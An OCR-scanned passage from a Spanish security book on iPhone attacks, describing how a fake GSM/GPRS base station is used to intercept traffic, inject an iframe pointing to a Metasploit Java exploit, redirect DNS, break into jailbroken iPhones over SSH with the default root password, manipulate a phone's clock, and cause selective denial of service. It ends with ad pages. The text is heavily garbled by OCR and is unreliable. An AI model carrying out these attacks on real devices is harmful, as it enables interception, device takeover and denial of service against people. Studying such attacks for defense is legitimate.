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roctélabgsmd0:-4 sql /vartogt/ 
SOLize version 3.7.13 2012 06 11 02 
Enler «nel for insiruel ions 
Enter SQL statements termirated with a 
sqlite> selecz * from subscriber; 
(2013-01-03 [2 12013-01-03 |]|2140[- Resto de IMSI ocultado 


set authoriz: where id=1; 

* fron subscriber; 

1/2C13-01-03 [2 /2013-01-03 []/2140[- Resto de IMSI ocultado 
-] | [name] | [ext 11 11 1110 


sql ies 


Una vez autorizado el IMSI de la tarjeta SIM del dispositivo móvil, a partir de ese momento todos 
los intentos de registro del mismo, ya sean manuales o automáticos, tendrán éxito, y el dispositivo 
obtendrá servicio de la estación base falsa. En el momento del registro, si este es aceptado, y si 
se han habilitado previamente los mensajes relalivos a Mobility Management (MM) como se ha 
indicado antes, en la sesión de J'LLNE'I conectada a OpenBSC deberán aparecer mensajes similares 


a los siguientes: 


MSI 


<00C2> gan 94_0 
ATIACA 

<00C2> gsm 94 08.c:460 IDENTITY RE 
<0002> gan_94_0€6.0:424 -> LOCATION U2DA' 
<00C2> gsm_d4_90.c:766 -> MM INFO 
<00C2> gam_3ubacriber.c:352 Subscriber Phonel ATTACHED LAC=1 
<0002> 1 I4_IA.c 62 TMST Reall d. Subs: 


2:1046 ZCCATION UPDAT REQUEST: mi lyr 


Dx04 MILI) Lyp 


ri type=0x02 MI([]) 
ASCZPT 


por: ¿Bhoncá-ORANCE 


ation 


Y en la sesión de TELNE conectada a UsmoSGSN deberán aparecer mensajes similares a los 
siguientes: 


640 -> GMM ATTACH REQUEST MI([IMST 
352 <- GPRS NUNACE ACCADI (aw P- 
me. c:1042 -> ATTACH COMPLET= 


ltado]) type="GpRS 
Dx5e7356ch) 


<0007 
<00C2> gprs 


Y en el momento el disposilivo intente concclarse a Internet, la sesión de TELNET concelada a 
OsmoSGSN deberán aparecer mensajes similares a los siguiente: 
<0002> gprs_gmm.c:1309 -> ACTIVATE PDP CONTEXT RZQ: SAPT 


Create PDF Context 
O libgtp cb_cont (Lyp> 


ETF 12v4 


16, causc=128, pdp=Ux/F8bdav16390, 


Received CREATE PIP C 


= t accepted) 
TLLI=de3b6eb, SAPI=3, 
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Prueba de conexión a Internet desde el dispositivo victima 

¿Una forma rápida de verificar que todo cl entorno esté funcionando correctamente para cnrular 
tráfico del dispositivo a Internet y viceversa, es abrir el navegador en el dispositivo móvil e intentar 
navegar a cualquier URL conocida. Por ejemplo, navegar a “http://www.Google.com” y realizar una 
búsqueda de un término cualquiera (por ejemplo “Taddong”). Si las páginas se cargan correciamonte, 
tanto la de introducción de la búsqueda como la de resultados de la búsqueda, se podrá concluir que 
el entorno está enrutado el tráfico IP correctamente. 


Interceptación de comunicaciones de datos 

Dado que todo el tráfico IP del cliente, o clientes, GPRS es enrutado vía el equipo de manipulación, 
bastará utilizar en este equipo un sniffer de red, como Wireshark, para capturar las comunicaciones 
de datos de los dispositivos móviles. De esta manera, todos los datos que no circulen cifrados, 
podrán ser decodificados en el equipo de manipulación. 


Ejemplo: Interceptación de comunicaciones HTTP 
Si desde el dispositivo móvil se accede por HTTP a un servidor web, la información intercambiada 
entre el dispositivo y el servidor viajará en claro, y su contenido podrá ser observado en el equipo de 
manipulación sin más que ejecutar Wireshark y filtrar por “http”. 


Imagen 12.06: Captura de una sesión HTTP en el equipo de manipulación 


Por ejemplo, si el usuario del dispositivo móvil abre su navegador, visita la página del buscador de 
Google, y busca un término, como por ejemplo “patata”, en el Wireshark del equipo de manipulación 
se podrá observar que el usuario ha visitado esa página, y cuál ha sido el término que ha buscado 
en ella. 
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Otros ejemplos 


Pero las comunicaciones HTTP del navegador no son las únicas comunicaciones no cifradas 
ulilizadas habitualmente por dispositivos móviles. 


Para empezar, muchas aplicaciones, distintas del navegador, utilizan HTTP para comunicarse con 
sus servidores. Por ejemplo, las primeras versiones” de Whatsapp enviaban todo el tráfico en claro, 
mediante conexiones HTTP. 


Pero además, por supuesto, HTTP no es el único protocolo de comunicación de red que no cifra 
los datos: DNS, TELNET, ITP o SMTP son algunos ejemplos. Si alguna aplicación o servicio 
del dispositivo utiliza algún protocolo no cifrado, la información será accesible directamente a un 
atacante con la infracstructura descrita. 


Redirección y/o alteración de comunicaciones 1P 


Dado que todo el tráfico IP del cliente, o clientes, GPRS es enrutado vía el equipo de manipulación, 
será muy sencillo redirigir y/o alterar las comunicaciones de datos de los dispositivos móviles, 
utilizando, por ejemplo, reglas de /Prables. 


Ejemplo: Explotación de una vulnerabilidad de Java de un PC portátil 


Supóngase, por ejemplo, que el dispositivo móvil es un PC portátil con sistema operativo Windows 
XP SP3, con una versión de Java (JRE) anterior a la 6.24 y con un módem 2G/3G. 


Las versiones de JRE anteriores a la 6.24 tienen una vulnerabilidad para la cual existe un exploit 
disponible en Metasploif* (Java codebase trust”). Para explotar la vulnerabilidad usando este 
exploit, es necesario que el navegador del PC cliente navegue hasta una URL creada por Metasploit, 
en la cual este quedará escuchando. Si se logra que el navegador solicite el contenido de esa URI., 
Metasploit responderá al navegador enviándole cierto contenido malicioso que hará que se ejecute en 
cl PC víctima el código elegido (payload). como por ejemplo establecer una sesión de Meterpreter. 
Desde la sesión de Meterpreter, se dispondría de control completo sobre el PC víctima. 


Para que el navegador del PC victima solicite esa URL, se puede aprovechar la situación privilegiada 
de la máquina de manipulación, esperar a que el usuario victima navegue a cualquier página web, 
y entonces inyectar contenido IITML añadido dentro de alguna de las páginas Icgítimas visitadas, 
forzando al navegador a solicitar la URL de nuestro interés, pensando que forma parte de una de las 
páginas legítimas. 


25 Aproximadamente a partir de agosto de 2012, Whars4pp cifra sus comunicaciones. 
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/” Suponiendo que el explvil de Metasploit estuvicra escuchando en el puerto 8081 de la dirección 
192.168.200.33, y que el path definido para el exploit fuera “/javaexploit”, el código HTML a 
inyectar podría ser: 


«iframe sro-"at=3://197.168.200.33:8081/juvuexploit”></iframe> 


El detalle de la configuración concreta para realizar esa inyección de contenido HTML queda fuera 
del alcance de este libro, pero al lector no le será difícil encontrar en la red información sobre 
cómo hacerlo. Podría utilizarse, por ejemplo, /Ptables. para redirigir el tráfico web a una instancia 
de squicf*. proxy. configurado como proxy transparente, combinado con un servidor ICAP como 
e-icap”, para realizar la inyección propiamente dicha. 


Imagen 1 : Owning a PO vía GPRS/Fdge. 


En la siguiente URL se puede ver un vídeo mostrando este ataque paso a paso: hrtp:/Avww. youtube. 
comawatch?v=EXNDhcHUfes 


Y el mismo video está también disponible para su descarga en: hitp:⁄/www.tuddong.com/es/lab. 


himiitVideoOwiningPCviaGPRS 


28 tp: Zhwwwowe squie-cacho org) 


icap.sourceforge.ner 
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Otros ejemplos 

Obviamente, la redirección de tráfico puede ser útil para un atacante en múltiples escenarios. Por 
ejemplo, puede redirigir las peticiones DNS a un servidor bajo su control, que para determinados 
nombres deyuelva traducciones falsas. De hecho, la infraestructura descrita ya permite eso sin más 
que introducir las traducciones falsas en el fichero /etc/hasts del equipo de manipulación, porque de 
allí las leerá dnsmasq, que es el servicio declarado como servidor DNS de los clientes GPRS. 


'lambién puede redirigir conexiones web a servidores web falsos, donde se le solicite información 
personal al usuario (por ejemplo, contenido de su tarjeta de coordenadas para operaciones bancarias), 
o donde cierto contenido malicioso intente aprovechar alguna vulnerabilidad de la aplicación cliente 
que está navegando, y así tomar control del equipo. 


Para conexiones como HTTP, en las que no se produce una autenticación del servidor, el resultado 
es indistinguible del servidor real para el usuario. Pero incluso para conexiones donde sí se dehe 
producir esa autenticación, como es ul caso de HTTPS, la redirección puede acabar pasando 
inadvertida al usuario si este no entiende bien el funcionamiento de los certificados SSL y acaba 
aceptando conectarse a un servidor cuya identidad no ha podido ser verificada. 


La redirección de tráfico es trivial de realizar, utilizando /Prables, como se ha descrito anteriormente. 


Además, aparte de redirigir el tráfico, un atacante podría manipular el contenido del mismo. Existen 
multitud de herramientas que permiten manipular distintos tipos de wáfito. Por ejemplo, usando 
squid como proxy transparente se podría usar un plugin que permitiera inyectar determinado 
contenido en ciertas páginas web, de modo que el cliente recibiría ese contenido insertado junto con 
el contenido legítimo, y a todos los efectos proveniente del servidor legitimo. Ese código HTML 
inyectado podría ser cualquier clase de contenido malicioso. 


Ataque directo vía TP 


Los ataques descritos en los apartados anteriores se centran en la observación o manipulación de 
las comunicaciones iniciadas por el dispositivo mi Pero también son posibles ataques directos 
contra la dirección IP del dispositivo móvil: la dirección TP es conocida por el atacante, porque se la 
asigna él (mediante la configuración del GGSN), y es accesible directamente. es decir, sin firewalls 
de red intermedios, desde cl equipo de manipulación. —— 


Así, desde el equipo de manipulación. se puede lanzar, por ejemplo, un escaneo completo de todos 
los puertos TCP y UDP del dispositivo, intentando encontrar servicios activos y accesibles desde 
el exterior. Si alguno de esos servicios accesibles presentara alguna vulnerabilidad, se tendría un 
camino para tomar control remoto del dispositivo móvil. 


Ejemplo: Escanco de puertos contra un teléfono móvil 


La siguiente figura muestra un escaneo de la lista de puertos por defecto de Nmap, ejecutado contra 
un ¿Phone 4 con iOS 4.3.1. 
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rco=ilasgsm00:-+ amar ~ zan M. 


Starting Nnap 6.09 ( 1 p.org ) at [1 


Not skowr 
PORT 


Nmap sons: 1 IP address (1 host up) scanned i 


Imagen 12.08: Escaneo de puertos por defecto de Nmap, contra de un ¿Phone 4 con iOS 4.3.7- 


Ubsérvese que además del puerto 62078/lcp. dedicado al servicio de sincronización, el ¿Phone tiene 
también abierto el puerto 22/tcp, correspondiente a SSH. Esto indica que el teléfono tiene hecho cl 
Jailbreak, ya que Apple no permite la instalación de un servidor SSH. 


Si quien hiciera el Jailbreak en su momento no tomó la precaución de cambiar la contraseña de 
root, se podría entrar en cl dispositivo utilizando la que hay por defecto, que es “alpine”. En este 
caso, efectivamente, se lograría entrar con dichas credenciales por defecto, como se muestra cn la 
siguiente figura. 


sura yom wan: Lo co! F ng (yes/no) 
Warnirg: Permanently added *10.13.13.2" (RSA) to Lhe list of known hosts 
racte 0.13.13.2"x [alpine] 
i 1 unsme -a 
y Thu Feb 20 
2011; root:xnu-1735.46-2/RILTA: > JIX ¿Phor arm X90AP 


zooté" ls -la / 


/38 Jan 16 
dan 26 04 .. 
Zeb 7 2 „tile 
Jan 18 2012 Applications 
druxzux: 2 imir 63 Mar 18 2011- Devetepe: 
druxr-xz-x aki May 13 2012 Library 
drwzr-xr-x 1 May 1C ¿012 System 
lrwxr xr x Jar 16 12 User -> /varfucbile 
drwxr-xr-x May 12 2 bin 
4 May 13 2012 5oot 
G8 Feb 7 72 cores 
1634 can 16 dev 
12 Muy 13 eto -> private/ato/ 
wnsel 68 Det 28 2006 lib 
wasel 68 23 2006 mot 


drwxr-xr-x 
drwxrwxr t 
dr-xr-xr-x 


lrwxr-xr-x 
drwzr-zr-z 
dro 


ENELRNNNIa 


Imagen 12.09: Entrando por SSH en un ¿Phone con Jeilbreek hecho, utilizando la contrascña por defecto de root. (Parte 1). 


li 
j 
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136 Apr 11 2011 pri 
546 May 13 2012 sbin 

16 May 13 2012 Lap -> provate/var/tm 
3/4 May 10 2012 usr 

12 May 13 2012 var > private/var/ 
root+ 


dewxr-xr x= 4 
drwxr=xr=x 2 
Trwxr-xr-x 1 Y 
drwsr-sr x 19 
lrwxr-xr-x l 
¡Phone-de-Adrinistrador:- 


Imagen 12.09: Entrando por SSH en un ¡Phone vou Jailbreak hecho, utilizando la contraseña por detecto de roor. (Parte y 


Si no se hubiéra encontrado el servicio SSH con la contraseña por defecto, se podría intentar bu; 
una vulnerabilidad en cualquier otro servicio que estuviera abierto, como por ejemplo el servii “d 
sincronización, que escucha en el puerto 62078/Lcp. Si se hiciera un escaneo completo de todos los 
puertos, quizás se encontrarían más servicios abiertos, los cuales se podrian alacar. 


Otros ejemplos 

Obviamente el escaneo de puertos y el consiguiente ataque a los servicios que ofrezca el dispositivo 
móvil, es aplicable a cualquier tipo de dispositivo, tanto si se trata de un teléfono, como si se trata 
de una tableta o incluso de un PC conectado mediante modem 3G. En cl caso de que el dispositivo 
víctima sea un PC (conectado mediante modem 3G) es más probable que este tenga instalado y 
configurado un firewall que prohíba las conexiones entrantes, impidiendo el acceso desde el exterior 
a sus servicios. No obstante, no es extraño encontrarse con PCs en los que el usuario ha deshabilitado 
el firewall, o este ha sido configurado permitiendo el acceso a determinados servicios, como el de 
compartición de carpetas. Por tanto, muchas vale la pena probar incluso en este caso. 


Ataques a dispositivos especiales 


Hasta ahora el capítulo ha estado centrado en los dispositivos móviles más comunes, como pueden 
ser teléfonos, tabletas y PCs, pero hay muchos otros dispositivos que también utilizan la cobertura 
GPRS/Edge. y todos los ataques descritos podrían ser lanzados también contra cualquiera de esos 
dispositivos. 


Ejemplo: Ataque a un router 3G 

Hoy en día muchas pequeñas oficinas de muy variada índole (y también domicilios particulares). 
se conectan a Internel a través de un router 3G. Un atacante que lograra dar cobertura a ese router 
utilizando una estación base falsa, como se ha descrito antes, comprometería todas las comunicaciones 
no cifradas que se produjeran entre cualquiera de los dispositivos de la oficina e Internet. 


Lo úmico contra lo que los dispositivos de dentro de la oficina estarían probablemente protegidos, 
sería contra el ataque directo vía TP, puesto que probablemente el router ocultará las dirci 
TP de los equipos interiores haciendo NAT. El ataque directo vía IP se podria lanzar solo contra el 
propio router, lo cual no deja de ser interesante para un atacante, porque muchos routers son dejados 
con configuraciones por defecto que ofrecen servicios poco protegidos. 


ones 
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Imagen 12.10: El ataque a un router 3G compromete las comunicaciones de los dispositivos que hay detrás de él 


Otros ejemplos 


Aparte de los ya comentados, hay muchos otros tipos de dispositivos que utilizan GPRS/Edge para 
sus comunicaciones, como por ejemplo: 


Rastreadores GPS, 

Datáfonos de tarjetas de crédito (también llamados TPV, Terminales de Punto de Venta) 
Cámaras de vigilancia. : 
Estaciones meteorológicas. 

Dispositivos de conlrol (SCADA). 


g 


Imagen 12.11: Otros dispositivos GPRS/Edge. 
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| Todos estos dispositivos también son susceptibles de ser atacados como se ha descrito anteriormente, 
y 


|. y lamentablemente, en muchas ocasiones, muchos de ellos no han sido protegidos convenientemente. 
\ 


5. Manipulación de fecha y hora 


El estándar GSM ofrece la posibilidad de que las estaciones base incluyan información de 
sincronización de fecha y hora en la señal de broadcast, que los móviles pueden utilizar para 
sincronizar su propio reloj y calendario. I.a mayoría de los dispositivos móviles ofrecen al usuario la 
posibilidad de sincronizar automáticamente el reloj interno con esta información de hrvadeas! de las 
estaciones base, de modo que el dispositivo siempre tenga la fecha y hora correctas del lugar donde 
se encuentra, Por ejemplo, en un ¿Phone se puede encontrar esta opción dentro del menú Ajustes 
-> General -> Fecha y Hora, y la opción se llama “Ajuste automático”: y en un teléfono Android es 
posible encontrar esta opción dentro del menú Configuración -> Fecha y hora, y la opción se llama 
“Fecha y hora automáticas”. 


La gran mayoría de los usuarios tienen activada esta opción. Lin muchos casos simplemente porque 
es la opción que viene configurada por defecto (en la mayoría de terminales), y en otros porque el 
usuario opta por ella por comodidad. Sea por el motivo que sca, si un usuario liene activa esta opción 
en su dispositivo móvil, es vulnerable a un ataque remoto de modificación de fecha y hora, realizado 
utilizando una estación base falsa. 


Infraestructura necesaria 
Para realizar esta manipulación remota. un atacante puede utilizar la misma infraestructura basada 
en OpenBSC ya descrita anteriormente. 


Procedimiento de ataque 

El procedimiento a seguir para realizar el ataque es muy  angilloalodnien gue hay que hacer es 
configurar, antes de comenzar a dar cobertura con la estación falsa, el sistema operativo del 
equipo OpenBSC para que su fecha y hora sean en las deseadas hd el móvil: y a continuación, 
simplemente dar cobertura al móvil víctima con la estación base falsa. 


Resultado del ataque 
Cuando el dispositivo detecta un cambio | de Location Area, si está configurado para ajustar la fecha y 
iaa forma automática, reajustará su reloj y calendario para hacerlo coincidir con la información 
emitida por la celda. Por tanto. a los pocos segundos de haber accplado la a de la estación 
base falsa, el dispositivo habrá asumido la fecha y hora emitidas por la estación. 


Esto se puede utilizar tanto para hacer saltos al futuro como al pasado. Dependiendo del dispositivo, 
el rango de fechas a las que se podrá saltar puede ser distinto. Por ejemplo, en algunos dispositivos 
no es posible establecer una fecha anterior al 1 de enero de 2000. 


Ejemplo: cambio de fecha y hora de un iPhone y un Android 
Las siguientes figuras muestran un par de ejemplos de realización de este ataque, primero contra un 
iPhone y después contra un dispositivo Android. 


En ambos casos, la fecha de los dispositivos antes de realizar el ataque era alrededor del mediodía 
del 20 de enero de 2013. y la fecha elegida para los móviles tras el ataque es la mañana del 18 de abril 
de 201 1, de modo que el usuario victima disponga de un día completo para salvar a la humanidad”, 


Antes 


E 


È i 


Imagen 12.12: Cambio de fecha y hora de un dispositivo iPhone. 


Antes Después 


Imagen 12.13: Cambio de fecha y hora de va dispositivo Android, 


30 El sisteme de defensa antimisiles Skyner se activó el 19 de abril de 2011, y dos dias después declaró la guerra a la 
humanidad y desencadenó un apocalipsis nuclear. Las crónicas de Sara Connor. 2007. 
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Posibles usos 

La utilidad para el atacante de este tipo de ataque puede ir desde hacer que el usuario del dispositivo 
móvil víctima llegue tarde a una reunión, hasta posibilitar la realización de otros ataques que 
dependan de la variable tiempo. como por ejemplo el acceso a las fotos almacenadas previamente en 
un dispositivo que ha sido bloqueado, como se describe en el apartado “Accediendo a las fotos de un 
iPhone con iOS 5.X cambiando la fecha”, perteneciente al capitulo “iPhone Local Tricks”: 


6. Ataque de denegación de servicio 


Existen varios métodos para realizar ataques de denegación de servicio contra terminales móvilos, 
de los cuales en este apartado se detallará cómo realizar 2 de ellos que pueden llevarse a término 
utilizando las infraestructuras propuestas. Una recopilación de posibles alaqucs y la teoría subyacente 
tras los mismos pueden encontrarse en: htp://www.taddong.com/does/RootedCon2012-Nuevas_ 
escenarios_de ataque GSM_GPRS.pdf 


A continuación se describen posibles vías de implementación de cstos ataques de denegación de 
servicio que pueden ser demostrados en entornos controlados. à 


Ataque de denegación de servicio selectivo basado en redirección 
de llamada 


Uno de los ataques, que puede ser implementado con la infracstructura propuesta, consiste en la 
redirceción de la llamada saliente del terminal víctima a una locución de tonos que haga pensar a la 
víctima que tiene servicio aunque no lo tiene. Con este método se consigue que el terminal víctima 
sufra una denegación de servicio transparente (no se percibe ningún síntoma de que no se tiene 
servicio) y selectiva (puede atacarse un terminal en concreto y otro no). 


Una posible forma de implementar cl ataque consistiria en realizar la siguiente modificación en la 
configuración del contexto [phones] del dialplan: 


exter => _X.,n, Local F(Y[SICALLERZD num) ) != 1091] incdos) 

exter -> _X.,n, Answer () 

exter => X.,n,Ringing() 

exter => X., n, wait (20) 

exter -> _K.,n, Busy () 
X.,n,BangUp () 
_X.,mirodos) ,Nc0p(); 


Wait 20 seconds” 


then kaag up 


Nota: Como se puede ver, el ataque de denegación de servicio puede implementarse 


de forma totalmente sele: de ser totalmente transparente para el usu; 
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Nota: La configuración propuesta hace uso de los recursos por defecto de Asterisk. 
Sería posible grabar cualquier tipo de tono, locución, etcétera, y personalizar total- 
mente esta prueba de concepto. 


Ataque de denegación de servicio selectivo basado en códigos de 
rechazo de registro 

El segundo ataque de denegación de servicio consigue que el terminal victima quede en un estado 
inválido (sin comunicación) hasta que el móvil se rearranque. La técnica consiste en enviar un: 
código de rechazo del registro del terminal víctima que la indique que su SIM no es válida. Ya que 
en GSM no existe autenticación del operador, el terminal victima está forzado a actuar según esas 
indicaciones. - 


Se puede conseguir este efecto mediante la ejecución de las siguientes acciones: 


- Modificar el parámetro de OpenBTS Control. LUR. UnprovisionedRejectCause al valor de 
0x03 (Illegal MS). 

- Parar la emisión de OpenBTS y esperar a que el móvil victima pierda servicio. 

~ Desprovisionar en el Asterisk el terminal victima (para que sea fechazado cuando intente 
el registro) 

- Volver a arrancar OpenBTS: 


Cuando el móvil intente registrarse de nuevo en la estación base falsa recibirá el código de rechazo 
que le producirá el efecto descrito. En la siguiente figura puede verse que un ¿Phone, tras ser 
rechazado con un código 0x02 (IMSI Unknown in HER), 0x03 (Megal MS) ó 0x06 (Illegal ME), 
queda en estado “No Service” hasta que se rearranca el dispositivo: 


Imagen 12.14: Ataque DoS a un ¿Phone mediante LU Reject Cause Codes. 


'hone & iPad 
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Una descripción detallada de los fundamentos del ataque puede encontrarse en: hitp://mww.taddong, 
comídocs/RootedCon2012-Nuevos_escenarios_de_ ataque GSM GPRS.páf. Además es posible 
encontrar demostraciones en: hr1p:/fvimeo.com/47191773- 


Nota: El ataque es totalmente sel ontrola a través de la gestión de 
usuarios de la infraestructura! 


Nota: La caracteristica diferencial de este ataque es que presenta cierta persistencia, 
en el sentido de que incluso cuando el atacante ha dejado de cstar presente la denega- 
ción persiste hasta que el usuario reinicia su terminal. 


7. Otros posibles ataques 


La infraestructura descrita puede utilizarse para realizar otro tipo de pruebas de concepto o 
investigación sobre las comunicaciones móviles. A continuación se eoa algunas sugerencias 
de usos adicionales de la infraestructura que se ha propuesto. 


Fuzzing sobre la pila de protocolos GSM/GPRS y ataques a la banda base 

Las infraestructuras basadas en estación basc falsa pueden utilizarse para realizar fuzzing sobre la 
pila de protocolos GSM. Existe una variedad de trabajos al respecto" % donde se estudia la robustez 
de diferentes partes del conjunto de protocolos mediante esta técnica. Algunos de estos trabajos han 


llevado a encontrar vulnerabilidades explolables. 


Lsta técnica abre la puerta a ataques que no dependen de la fortaleza de los métodos de autenticación 
y establecimiento de cifrado y por tanto es teóricamente viable para cualquier generación de 
tecnología móvil, incluyendo 3G y LTE. 


Ataques mediante SMSs 
Una estación base falsa proporciona un mecanismo ideal para realizar pruchas de ataque sobre 
diversas modalidades de SMS: 


- SMSs tipo flash. 


31 “Fuzzing the GSM protocol” jrin www googie. es/u? sa=t&rcr=j&q=openbis 
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- SMSs con VCards. 

- WAP Push messages. 

- MMS (Multimedia Messaging Services). 
- (USIM Data Download. 


En la actualidad, ya se han realizado trabajos que demuestran cómo se puede utilizar la infraestructura 
que se describe en este capitulo para realizar fitzzing sobre los protocolos transportados mediante 
SMS”. 


Localización geográfica de terminales móviles 

La localización geográfica de terminales móviles es una funcionalidad de los provecdores de 
servicio de telefonia móvil, recogida en la norma GSM bajo el nombre de 1.CS (Location Services)”. 
Esta funcionalidad está definida con el objetivo de que los operadores puedan ubicar la posición 
geográfica de los Lerminales móviles a los que se está dando servicio, con múltiples propósitos. 


Es posible aprovechar parte de esta especificación para conocer la ubicación de un terminal móvil 
al que se le está atacando con la infraestructura de estación base falsa. El protocolo RRLP (Radio 
Resource Location Services), definido en la norma GSM como parte del conjunto de protocolos LES 
(Location Services), permite a la estación base interrogar al cualquier terminal registrado sobre su 
posición geográfica, utilizando para ello los canales de señalización GSM”, Ll terminal, si soporta 
RRLP*, contestará con su posición geográfica, que puede ser obtenida a través de su GPS o mediante 
mediciones de las señales provenientes de la red. Tanto OpenBTS como OpenBSC soportan este 
protocolo por lo que pueden ser usadas con este propósito, 


Aún sin hacer uso de las especificaciones de LCS (imagínese por ejemplo el caso de un dispositivo 
móvil que haya deshabilitado inrencionadamente todos sus servicios de localización), es posible 
determinar la posición de un terminal móvil registrado en una estación base falsa. Cuand 
terminal está registrado en una estación base y establecido un canal de radio, cnvía información 
acerca del retardo y potencia percibida de la señal. Por otro lado, la estación base también percibe 
el retardo y la potencia de la scñal del móvil. Obteniendo esta información desde varios puntos 
distintos y/o combinando esta información con la proporcionada una antena direccional, sería 
posible establecer la posición exacta de un móvil que se pae alcance de la estación base. 
Algunos trabajos ya han sido realizados al respecto”. 


33. “SMS Vulnerability Analysis on Feature Phones” 
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26 Aunque el soporte a RRIP no es obligatorio, la mayoría de los dispositivos móviles actuales lo soportan. 
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Recover Messages 


Recover Messages es un servicio que permite examinar y recuperar datos de aplicaciones que utilizan 
SOL.ire como hase de datos. Dichas aplicaciones están incluidas en smartphones ¡Phone y Android 
principalmente, ejemplos de ello son WhuisApp, Line, SpoíBros etcétera. 


Gracias a Recover Messages es posible inspeccionar y recuperar la información de ficheros SOLite 
facilitados por el usuario, que serán tralados cn nuestros sistemas o en los de nuestros provecdores 
de sistemas de forma automática, y totalmente confidencial, incluyendo por supuesto las medidas 
de seguridad pertinentes. 


Tanto la incorporación de ficheros SOLite como la obtención de los datos que dichos ficheros 
almacenan, son guiados paso a paso con asistentes desde la propia web, lo que hace muy sencilla la 
utilización de este servicio pionero. 


El servicio tiene dos modalidades: 


- Gratuito. En este caso el usuario tendrá funcionalidades limitadas, siendo posible 
únicamente acceder a los mensajes WhatsApp de los dispositivos iPhone y Android. 

- Con licencia. En este caso el usuario tendrá todas las funcionalidades del servicio, que 
incluye además de las incluidas en la modalidad gratuita, la posibilidad de recuperar Mensajes 
SMS y Emails de ¿Phone y Andrvid, además de los archivos utilizados con otras aplicaciones 
de iPhone como tuenti. SpotBros y Line. 


El servicio está disponible en castellano y en inglés en http:/recovermessages.com 


Pantalla principal de Recover Messages. 
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Cálico Electrónico 


“Cálico Electrónico” se ha convertido en la serie de animación Flash más famosa de España. Ln 
clave de humor y con una animación de gran calidad, Cálico Electrónico es un superhéroe "aspañol" 
alejado totalmente del patrón establecido en los superhéroes: Cálico es bajito, gordo, y no tiene 
ningún poder. Lo que sí tiene es la fijación de salvar a su ciudad "Electrónico City" de cualquier mal. 


Ll origen de “Cálico Electrónico” fue una campaña de márketing de una web. No obstante, el éxito 
que tuvo superó todas las expectativas y se creó una identidad propia. “Cálico Electrónico” ha hecho 
famoso a su creador, Nikodemo, que a partir de entonces creó un estudio de animación llamado 
Nikodemo Animation, Tras los éxitos iniciales, la serie luvo 3 temporadas de 6 capítulos cada una, 
incluyéndose en ellas unas tomas falsas, al estilo de las películas con actores reales. Además de 
los capítulos oficiales se hicieron también capítulos especiales, y una serie paralela llamada “Los 
huérfanos electrónico: 


En la actualidad los fans de “Cálico Electrónico” pueden acceder a multitud de productos de la serie, 
ya que se han generado nuevos capítulos y se han reeditado los antiguos en alta calidad, dichos 
capítulos están disponibles para dispositivos iPhone, Windows Phone, Windows 8 o Android. 


*CALICO ERICO ELEC ELECTRO. 


novedades temporadas tiras 


Temporad: 4 


ori jo Biia: 


Aplicación de “Cálico Electrónico” para Windows Phone. 


También ha aumentado la demanda de productos de Cálico, como cómics, DVDs con los capítulos 
„ tazas, barajas de cartas y un largo etcétera. 


de la serie, muñecos, camiseta 
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Ejemplos de productos de la tienda de Cálico Electrónico. 


Otra novedad son las "Tiras Cálico", que se corresponden a unas tiras cómicas de 3 o 4 viñetas, al 
estilo de otros personajes conocidos como Garfield o Mafalda. Dichas tiras aparecen cada miércoles 
y también se pueden ver en los dispositivos mencionados, Además los fans tienen la posibilidad 
de enviar sus fotos disfrazados de Cálico, o enviar sus propios dibujos de este peculiar superhéroe. 


VESE, LO PONG BIG 


Ejemplo de “Tira Cálico”. 


Para que los fans estén informados, se mantienen varios canales abiertos sobre cl producto: 
- Twitter: Atips./twitter.com/CalicoOficial 
- Google Plus: Atps://plus.google.com/107186057128422961644/posts 
- Tuenti: ht(p://www.tuenti.com/calicoelectronico 
- Youtube: hrrp:/Avww.youtube.com/calicoelectronicohd 
- Facebook: htíps:/Awww.facebook.com/CalicoElectronicoOficial 


Además de todo esto, y para mantener vivo el proyecto, se han realizado trabajos en el mundo de la 
publicidad, visitado una docena de congresos y festivales de cómic, se ha cerrado la ilustración de 
un libro que pronto saldrá a la venta y se ha firmado un nuevo cómic con Ediciones Babylon que 
está a punto de ver la luz. 


Toda la información acerca de “Cálico Electrónico” y de los productos mencionados está disponible 
en htip://www.calicoelectronico.com/ 


A día de ES se han vendido más de 500 millones de dispositivos ¡OS y aunque la gurid 
del sistema ha mejorado con cada versión todavía se pueden encontrar vulnera idades 
explotar. Hay que recordar que el punto más debil en un sistema son los usuarios, una 
figuración por defecto o incorrecta, la falta de actualización del sistema, o simplem 
desconocimiento del usuario propician y hacen más que probable un: angue exitoso al 
sistema, con todo el peligro que ello conlleva. 
Las auditorias de seguridad en empresas cada vez se encuentran cón más dispositivo: ios 
entre sus objetivos. Las políticas de BYOD (Bring Your Own Device) hacen que cada ve: 
empleados utilicen sus iPhone o iPad en sus puestos de trabajo, con sus aplica: 
rativas, y desde las redes de las empresas, lo que hacé que haya que assi 
posibles riesgos de seguridad. Fi E 
En este libro se han juntado un nutrido grupo de expertos en seguridad en la Era 
recopilar en un texto, todas las formas de atacar un terminal ¡Phone o iPad de un 
determinado. Utilizando metodologías aplicables a cualquier sistema, como los 
MITM (Man In The Middle), conexión a puntos de acceso suplantados (AP' 
ataques Client-Side, ataques en redes Wireless, ataques en local, ataques exclu 
plataforma iOS como JailOwnMe, el robo de datos a través del backup que ) se he 

y cómo utilizar las técnicas de Jailbreak en provecho de ¿Un auditor, 
aspectos que se tratan. 

Tarnbién se presenta una visión global sobre la arquitectura del sistema 
guiado por pruebas de concepto, con un enfoque eminentemente práctico, q 
lector a entender los riesgos a los que están sujetos este tipo de dispositivos; € 
replicar las pruebas en su propia máquina. i Además: se incluyen múltiples il 
Tricks, pequeños trucos a realizar en un dispositivo ¡iPhone teniendo acceso. 
mediante los que se podrá consultar la agenda de contactos: AS 
imágenes obtenidas con la cámara del dispositivo. ES 
Después de leer este libro, si un determinado usuario tiene un iPhone Si 
al lector se le ocurren muchas formas de conseguir la informaci ión qu 5 
controlar lo que con él se hace. 
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